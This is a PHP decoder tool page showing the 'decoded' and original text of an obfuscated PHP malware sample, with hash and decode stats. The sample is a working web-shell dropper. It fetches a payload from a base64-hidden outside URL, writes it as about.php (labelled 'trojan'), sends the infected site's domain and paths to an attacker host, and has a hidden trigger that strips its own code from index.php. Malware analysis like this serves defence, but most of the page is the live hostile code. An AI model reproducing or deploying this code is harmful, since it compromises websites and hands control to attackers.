Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$OOO0_O0_0_="bawhl+ehns4gh"; $OO0O___0O0="bawhl+eghs4gh"; $OO0O0__O0_=${ "GLOBALS" }..
Decoded Output download
<? $OOO0_O0_0_="bawhl+ehns4gh";
$OO0O___0O0="bawhl+eghs4gh";
$OO0O0__O0_=${
"GLOBALS"
}
["O0_O0_O0O_"]('$O__O00_OO0=\'\'','if(isset(${
"_SERVER"
}
["HTTP_HOST"])){
return ${
"_SERVER"
}
["HTTP_HOST"];
}
elseif(isset(${
"_SERVER"
}
["SERVER_NAME"])){
return ${
"_SERVER"
}
["SERVER_NAME"];
}
return $O__O00_OO0;
');
$OOO_O00_0_=${
"GLOBALS"
}
["O0_O0_O0O_"]('$url','$OO0O0_0_O_=@${
"GLOBALS"
}
["O_0O_0O0O_"]($url);
if(!$OO0O0_0_O_){
$O0O0_O_0O_=${
"GLOBALS"
}
["O__0O0_0OO"]();
${
"GLOBALS"
}
["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_URL,$url);
${
"GLOBALS"
}
["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);
$OO0O0_0_O_=${
"GLOBALS"
}
["O_OO_O000_"]($O0O0_O_0O_);
${
"GLOBALS"
}
["O_O_O000_O"]($O0O0_O_0O_);
}
return $OO0O0_0_O_;
');
$O_OO__0O00=${
"GLOBALS"
}
["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();
$O_0_O_OO00["path"]=${
"GLOBALS"
}
["O_00O0OO__"](${
"GLOBALS"
}
["O_00O0OO__"](\'//\',\'/\',${
"_SERVER"
}
["PHP_SELF"]),\'\',${
"GLOBALS"
}
["O_00O0OO__"](\'\\\\\',\'/\',${
"_SERVER"
}
["SCRIPT_FILENAME"]));
$O_0_O_OO00["domain"]=${
"GLOBALS"
}
["OO0O0__O0_"]();
$O_0_O_OO00["shell_link"]=${
"GLOBALS"
}
["OO0O___0O0"](\'aHR0cDovL3NjaS51b3IuZWR1LmtyZC9hYm91dC5waHA/NTIw\');
if(isset(${
"_GET"
}
["del"])&&${
"_GET"
}
["del"]=="my_code"){
$O0_0OO_O0_=$O_0_O_OO00["path"]."/indexphp";
$OO0O0O0___=@${
"GLOBALS"
}
["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0=${
"GLOBALS"
}
["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${
"GLOBALS"
}
["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);
$OO0O0O0___=@${
"GLOBALS"
}
["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);
if($OO0O0O0___>0){
die("delete success");
}
die("delete failed");
}
$OO_O__O000=${
"GLOBALS"
}
["OO0O___0O0"]("YWJvdXQucGhw");
$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;
$OO0O0O0___=@${
"GLOBALS"
}
["OOO_O00_0_"](${
"GLOBALS"
}
["OO0O___0O0"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));
$OO0O0O0___=@${
"GLOBALS"
}
["O000OOO___"]($O0O_0_O0_O,$OO0O0O0___);
if($OO0O0O0___>0){
$O_0_O_OO00["trojan"]="http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;
}
else{
$O_0_O_OO00["trojan"]="write failed";
}
$OO_0O00O__=sprintf(${
"GLOBALS"
}
["OO0O___0O0"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${
"GLOBALS"
}
["OOO0_O0_0_"](${
"GLOBALS"
}
["O___00OO0O"]($O_0_O_OO00)));
$O__OO0O00_=${
"GLOBALS"
}
["OOO_O00_0_"]($OO_0O00O__);
if($O__OO0O00_=="done"){
$O0_0OO_O0_=$O_0_O_OO00["path"]."/indexphp";
$OO0O0O0___=@${
"GLOBALS"
}
["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0=${
"GLOBALS"
}
["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${
"GLOBALS"
}
["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);
@${
"GLOBALS"
}
["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);
}
');
${
"GLOBALS"
}
["O_OO__0O00"](1); ?>Did this file decode correctly?
Original Code
$OOO0_O0_0_="bawhl+ehns4gh";
$OO0O___0O0="bawhl+eghs4gh";
$OO0O0__O0_=${
"GLOBALS"
}
["O0_O0_O0O_"]('$O__O00_OO0=\'\'','if(isset(${
"_SERVER"
}
["HTTP_HOST"])){
return ${
"_SERVER"
}
["HTTP_HOST"];
}
elseif(isset(${
"_SERVER"
}
["SERVER_NAME"])){
return ${
"_SERVER"
}
["SERVER_NAME"];
}
return $O__O00_OO0;
');
$OOO_O00_0_=${
"GLOBALS"
}
["O0_O0_O0O_"]('$url','$OO0O0_0_O_=@${
"GLOBALS"
}
["O_0O_0O0O_"]($url);
if(!$OO0O0_0_O_){
$O0O0_O_0O_=${
"GLOBALS"
}
["O__0O0_0OO"]();
${
"GLOBALS"
}
["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_URL,$url);
${
"GLOBALS"
}
["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);
$OO0O0_0_O_=${
"GLOBALS"
}
["O_OO_O000_"]($O0O0_O_0O_);
${
"GLOBALS"
}
["O_O_O000_O"]($O0O0_O_0O_);
}
return $OO0O0_0_O_;
');
$O_OO__0O00=${
"GLOBALS"
}
["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();
$O_0_O_OO00["path"]=${
"GLOBALS"
}
["O_00O0OO__"](${
"GLOBALS"
}
["O_00O0OO__"](\'//\',\'/\',${
"_SERVER"
}
["PHP_SELF"]),\'\',${
"GLOBALS"
}
["O_00O0OO__"](\'\\\\\\\\\',\'/\',${
"_SERVER"
}
["SCRIPT_FILENAME"]));
$O_0_O_OO00["domain"]=${
"GLOBALS"
}
["OO0O0__O0_"]();
$O_0_O_OO00["shell_link"]=${
"GLOBALS"
}
["OO0O___0O0"](\'aHR0cDovL3NjaS51b3IuZWR1LmtyZC9hYm91dC5waHA/NTIw\');
if(isset(${
"_GET"
}
["del"])&&${
"_GET"
}
["del"]=="my_code"){
$O0_0OO_O0_=$O_0_O_OO00["path"]."/indexphp";
$OO0O0O0___=@${
"GLOBALS"
}
["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0=${
"GLOBALS"
}
["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${
"GLOBALS"
}
["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);
$OO0O0O0___=@${
"GLOBALS"
}
["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);
if($OO0O0O0___>0){
die("delete success");
}
die("delete failed");
}
$OO_O__O000=${
"GLOBALS"
}
["OO0O___0O0"]("YWJvdXQucGhw");
$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;
$OO0O0O0___=@${
"GLOBALS"
}
["OOO_O00_0_"](${
"GLOBALS"
}
["OO0O___0O0"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));
$OO0O0O0___=@${
"GLOBALS"
}
["O000OOO___"]($O0O_0_O0_O,$OO0O0O0___);
if($OO0O0O0___>0){
$O_0_O_OO00["trojan"]="http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;
}
else{
$O_0_O_OO00["trojan"]="write failed";
}
$OO_0O00O__=sprintf(${
"GLOBALS"
}
["OO0O___0O0"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${
"GLOBALS"
}
["OOO0_O0_0_"](${
"GLOBALS"
}
["O___00OO0O"]($O_0_O_OO00)));
$O__OO0O00_=${
"GLOBALS"
}
["OOO_O00_0_"]($OO_0O00O__);
if($O__OO0O00_=="done"){
$O0_0OO_O0_=$O_0_O_OO00["path"]."/indexphp";
$OO0O0O0___=@${
"GLOBALS"
}
["O_0O_0O0O_"]($O0_0OO_O0_);
$O_OO_0_0O0=${
"GLOBALS"
}
["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");
$OO0O0O0___=${
"GLOBALS"
}
["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);
@${
"GLOBALS"
}
["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);
}
');
${
"GLOBALS"
}
["O_OO__0O00"](1);Function Calls
| null | 1 |
Stats
| MD5 | dd6bd02dba3bb0f5d0e28df861e4f289 |
| Eval Count | 0 |
| Decode Time | 33 ms |